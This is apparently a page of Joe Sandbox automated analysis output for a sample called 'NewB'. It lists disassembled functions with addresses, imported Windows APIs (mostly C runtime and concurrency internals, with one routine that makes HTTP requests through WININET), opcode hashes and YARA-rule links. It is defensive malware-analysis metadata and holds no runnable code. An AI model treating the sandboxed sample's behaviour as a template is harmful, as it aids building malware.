Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 28269a52f844bd6b0bb11319d7da6b153bd69c826bd19e1cc5584f753a31954b
Instruction ID: af5f5b2369d6489234153ff23f7a456441f7dc5a2e9aaacd988aa42e3d188be0
Opcode Fuzzy Hash: 28269a52f844bd6b0bb11319d7da6b153bd69c826bd19e1cc5584f753a31954b
Instruction Fuzzy Hash: 95514071A00219AFDF08DF64C595BEDB7B9FF28344F044069E945AB282DB38EE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001CAD3B Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001CAD51

Part of subcall function 001CA7F5: HeapFree.KERNEL32(00000000,00000000,?,001CF01E,?,00000000,?,?,?,001CF045,?,00000007,?,?,001CF447,?), ref: 001CA80B
Part of subcall function 001CA7F5: GetLastError.KERNEL32(?,?,001CF01E,?,00000000,?,?,?,001CF045,?,00000007,?,?,001CF447,?,?), ref: 001CA81D

_free.LIBCMT ref: 001CAD5D
_free.LIBCMT ref: 001CAD68
_free.LIBCMT ref: 001CAD73
_free.LIBCMT ref: 001CAD7E
_free.LIBCMT ref: 001CAD89
_free.LIBCMT ref: 001CAD94
_free.LIBCMT ref: 001CAD9F
_free.LIBCMT ref: 001CADAA
_free.LIBCMT ref: 001CADB8

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f597e269909cdea1fe7be5a16459abf472e47b084072a8f9264beb29b96e4377
Instruction ID: 1a1aeaad7ebbb221a1d6515ff698584f4c467d06fdcb784e4ab77bec2d249e0a
Opcode Fuzzy Hash: f597e269909cdea1fe7be5a16459abf472e47b084072a8f9264beb29b96e4377
Instruction Fuzzy Hash: FF216B7690024CEFCB46EF98C841EDD7BB9BF28344F4145A9F5159B121EB32DB948B81

Uniqueness

Uniqueness Score: -1.00%

Function 001B7455 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 001B74A1
SwitchToThread.KERNEL32(?), ref: 001B74C4
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 001B74E3
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 001B74FF
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 001B750A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001B7531

Strings

ppVirtualProcessorRoots, xrefs: 001B7529
count, xrefs: 001B746F

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: 0839620d1592598fcb27d165b24826f521ba51d998615adb968a470e71b783fa
Instruction ID: 46d405d2e5a40ca78c290cd047f979e711c35ee180816d2b850552f41b47cfad
Opcode Fuzzy Hash: 0839620d1592598fcb27d165b24826f521ba51d998615adb968a470e71b783fa
Instruction Fuzzy Hash: CB219434A00209AFCF15EF95C5959EDBBB5BF59350F104069E901A7391DB30AE41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001B6F0D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 001B6F27
GetCurrentProcess.KERNEL32 ref: 001B6F2F
DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 001B6F44
SafeRWList.LIBCONCRT ref: 001B6F64

Part of subcall function 001B4F5F: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 001B4F70
Part of subcall function 001B4F5F: List.LIBCMT ref: 001B4F7A

std::invalid_argument::invalid_argument.LIBCONCRT ref: 001B6F76
GetLastError.KERNEL32 ref: 001B6F85
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001B6F9B

Strings

eventObject, xrefs: 001B6F6E

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 165577817-1680012138
Opcode ID: ff0e9b9eedff67ea3072113dcf3d8b84cdb0fb8bbe60728b122f00fbe4da0a2c
Instruction ID: 5788bfec881ce08357c2d2b4617d8e978fa692fce250b8902d4c04672f142b47
Opcode Fuzzy Hash: ff0e9b9eedff67ea3072113dcf3d8b84cdb0fb8bbe60728b122f00fbe4da0a2c
Instruction Fuzzy Hash: AB11C275500204EBCB14EBA4DC8AFFE7778AB28310F604019F516AA4D1EBB49E84C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0019A922 Relevance: 13.8, APIs: 9, Instructions: 341networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(001E8E24,00000000,00000000,00000000,00000000), ref: 0019A95C
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0019A980
HttpOpenRequestA.WININET(?,00000000), ref: 0019A9CA
HttpSendRequestA.WININET(?,00000000), ref: 0019AA8A
InternetReadFile.WININET(?,?,000003FF,?), ref: 0019AB3C
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 0019ABF0
InternetCloseHandle.WININET(?), ref: 0019AC17
InternetCloseHandle.WININET(?), ref: 0019AC1F
InternetCloseHandle.WININET(?), ref: 0019AC27

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID:
API String ID: 1354133546-0
Opcode ID: a45f9c173d5e556936eb19273c927dcfc06d75b33b95a287d954a734f3fe2a73
Instruction ID: fdbceaf4a5e9acb9f143b684f988f5f8eb4460c6fa52080959563de7cfafffd1
Opcode Fuzzy Hash: a45f9c173d5e556936eb19273c927dcfc06d75b33b95a287d954a734f3fe2a73
Instruction Fuzzy Hash: B1C1E4B1A001589BEF28CF28CC88BAD7BB6EF45304F908198F50997691D7759AC4CFD6

Uniqueness

Uniqueness Score: -1.00%

Function 001D5622 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4eff3531a25611de6ac7be47da5ba06516f85ecce5ba28a8d543634c3fa6e41
Instruction ID: 08db55b5e7ce0c4d6487c9127a356ed78b513816c6c0125b5832cdfe5b83d38f
Opcode Fuzzy Hash: f4eff3531a25611de6ac7be47da5ba06516f85ecce5ba28a8d543634c3fa6e41
Instruction Fuzzy Hash: 3AC1FF70E04649EFDF19CF99D880BBDBBB2AF29314F10415AE405AB392DB709981CF61

Uniqueness

Uniqueness Score: -1.00%

Function 001B79D2 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 001B79F4

Part of subcall function 001B5DA9: __EH_prolog3_catch.LIBCMT ref: 001B5DB0
Part of subcall function 001B5DA9: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 001B5DE9

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 001B7A02

Part of subcall function 001B6A0E: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 001B6A33
Part of subcall function 001B6A0E: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 001B6A56

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 001B7A1B
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 001B7A27

Part of subcall function 001B5DA9: InterlockedPopEntrySList.KERNEL32(?), ref: 001B5E32
Part of subcall function 001B5DA9: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 001B5E61
Part of subcall function 001B5DA9: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 001B5E6F

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 001B7A73
Concurrency::location::_Assign.LIBCMT ref: 001B7A94
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 001B7A9C
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 001B7AAE
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 001B7ADE

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: 4c3f4647a4505f6253805f7e0ae94f746aadc58537385aa53a20a925ed51bfa0
Instruction ID: 26e325856e098a781c8861f7d3c44086e817d282bab1854b78ed6074319aa5cb
Opcode Fuzzy Hash: 4c3f4647a4505f6253805f7e0ae94f746aadc58537385aa53a20a925ed51bfa0
Instruction Fuzzy Hash: 82312830B0C255AFDF96AB7844927FEB7B69FE5300F0805A9D441D72C2EB244E4A87D1

Uniqueness

Uniqueness Score: -1.00%

Function 001C0A78 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001C0A8E
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,001B5D9F,?), ref: 001C0AA0
GetCurrentThread.KERNEL32 ref: 001C0AA8
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,001B5D9F,?), ref: 001C0AB0
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,001B5D9F,?), ref: 001C0AC9
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 001C0AEA

Part of subcall function 001B0302: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 001B031C

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,001B5D9F,?), ref: 001C0AFC
GetLastError.KERNEL32(?,?,?,?,?,001B5D9F,?), ref: 001C0B27
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001C0B3D

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: a749da68da0bb0651cf90eaa991ffae72612e0702f1b5c559d19bfe70632c93d
Instruction ID: 0bdea69d9b489c41aa7f53895be636eea663f64fb1d3fbaa53e9fdc6e9f78911
Opcode Fuzzy Hash: a749da68da0bb0651cf90eaa991ffae72612e0702f1b5c559d19bfe70632c93d
Instruction Fuzzy Hash: 7B119379A40341EBCB12ABB59C8AF9E76A89F2D744F140439F949DA152EBB0C9408771

Uniqueness

Uniqueness Score: -1.00%

Function 001CE9DF Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 001CEA09
_free.LIBCMT ref: 001CEAE2
_free.LIBCMT ref: 001CEB0F

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 069ca8da3afb777e513857f467cef68ebe7ae5c6daf7beaf2a27248690ef73c7
Instruction ID: c3628e5dbaec7892db299ea3db5d0eea56f7b21f8e9ea5eeff161d702c852078
Opcode Fuzzy Hash: 069ca8da3afb777e513857f467cef68ebe7ae5c6daf7beaf2a27248690ef73c7
Instruction Fuzzy Hash: 5F51E171904305AFDB21AFB89C85F7E7BE8AF31324F14416EE91197282EB72C980CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0019EE10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 185COMMON

Download Yara Rule

Strings

list too long, xrefs: 0019F2CD

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: mtx_do_lock
String ID: list too long
API String ID: 1389037287-1124181908
Opcode ID: 8280a3ec33d25e2d7b5508d41e8f51991d1eb3926ec666917a1101a48d090530
Instruction ID: 4ec76aacd49488bf1fe43cdd87278bdf4719e06cbe0599e042f90d8461d08757
Opcode Fuzzy Hash: 8280a3ec33d25e2d7b5508d41e8f51991d1eb3926ec666917a1101a48d090530
Instruction Fuzzy Hash: F861C3B4D046589BDB10DF64CD49BA9B7F8FF14300F0441AAE90DAB691E771EA81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001C4930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001C4967
___except_validate_context_record.LIBVCRUNTIME ref: 001C496F
_ValidateLocalCookies.LIBCMT ref: 001C49F8
__IsNonwritableInCurrentImage.LIBCMT ref: 001C4A23
_ValidateLocalCookies.LIBCMT ref: 001C4A78

Strings

csm, xrefs: 001C4A0D

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e3eeaa6eea9e2f888899a09d8d9d9f4f56e9f915aa9cd2291edc9e3bd3d0ded7
Instruction ID: 6c3663b614e28d86aa387da76566ae11167441b1c6305dc4591951030b23844e
Opcode Fuzzy Hash: e3eeaa6eea9e2f888899a09d8d9d9f4f56e9f915aa9cd2291edc9e3bd3d0ded7
Instruction Fuzzy Hash: 4641E534A042589FCF10DF68C891FAEBBB5BF29318F148159F9156B392C731EA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C1C19 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 001C1C32

Part of subcall function 001C1F01: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,001C197A), ref: 001C1F11

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 001C1C47
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C1C56
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C1D1A

Strings

switchState, xrefs: 001C1C4E
pContext, xrefs: 001C1D12

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID: pContext$switchState
API String ID: 1312548968-2660820399
Opcode ID: bbd53bd0f2896edc6ca31aa454c701eca02f88f25a8c719c1b0c2f1fc43ab49c
Instruction ID: 4aa3e0eb73409e1e7af7aeace9cca00abe1124e498da4a7ff06eaa0b39239062
Opcode Fuzzy Hash: bbd53bd0f2896edc6ca31aa454c701eca02f88f25a8c719c1b0c2f1fc43ab49c
Instruction Fuzzy Hash: E931A435A80214ABCB09EF64C885FADB3B5BF66310F20446DE91297242DB71EE05CA94

Uniqueness

Uniqueness Score: -1.00%

Function 001BE8A2 Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 001BE8CA

Part of subcall function 001BE637: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 001BE66A
Part of subcall function 001BE637: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 001BE68C

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BE947
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 001BE953
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 001BE962
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 001BE96C
Concurrency::location::_Assign.LIBCMT ref: 001BE9A0
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 001BE9A8

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 850d062ee307e4119ad76e7c1296002541fc4ec2e3de9f91c55e86bcb970064e
Instruction ID: 86959b041d478aaca36d6595b6a2b92dfd0bedc374ac1ad949961f6034024363
Opcode Fuzzy Hash: 850d062ee307e4119ad76e7c1296002541fc4ec2e3de9f91c55e86bcb970064e
Instruction Fuzzy Hash: A7412935A00205DFCF05EFA4C484BEDB7F9BF88304F1480A9ED499B286DB70A945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001CF02C Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001CEFF4: _free.LIBCMT ref: 001CF019

_free.LIBCMT ref: 001CF07A

Part of subcall function 001CA7F5: HeapFree.KERNEL32(00000000,00000000,?,001CF01E,?,00000000,?,?,?,001CF045,?,00000007,?,?,001CF447,?), ref: 001CA80B
Part of subcall function 001CA7F5: GetLastError.KERNEL32(?,?,001CF01E,?,00000000,?,?,?,001CF045,?,00000007,?,?,001CF447,?,?), ref: 001CA81D

_free.LIBCMT ref: 001CF085
_free.LIBCMT ref: 001CF090
_free.LIBCMT ref: 001CF0E4
_free.LIBCMT ref: 001CF0EF
_free.LIBCMT ref: 001CF0FA
_free.LIBCMT ref: 001CF105

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d2c581018c698599584711ab45f24c1078ff6b42d56dc436d3d44221cec0f7ca
Instruction ID: 7ef1c7b931769d55d59834c2c5fb06fb434cb6e8f6ba13659ec6e7dea2722857
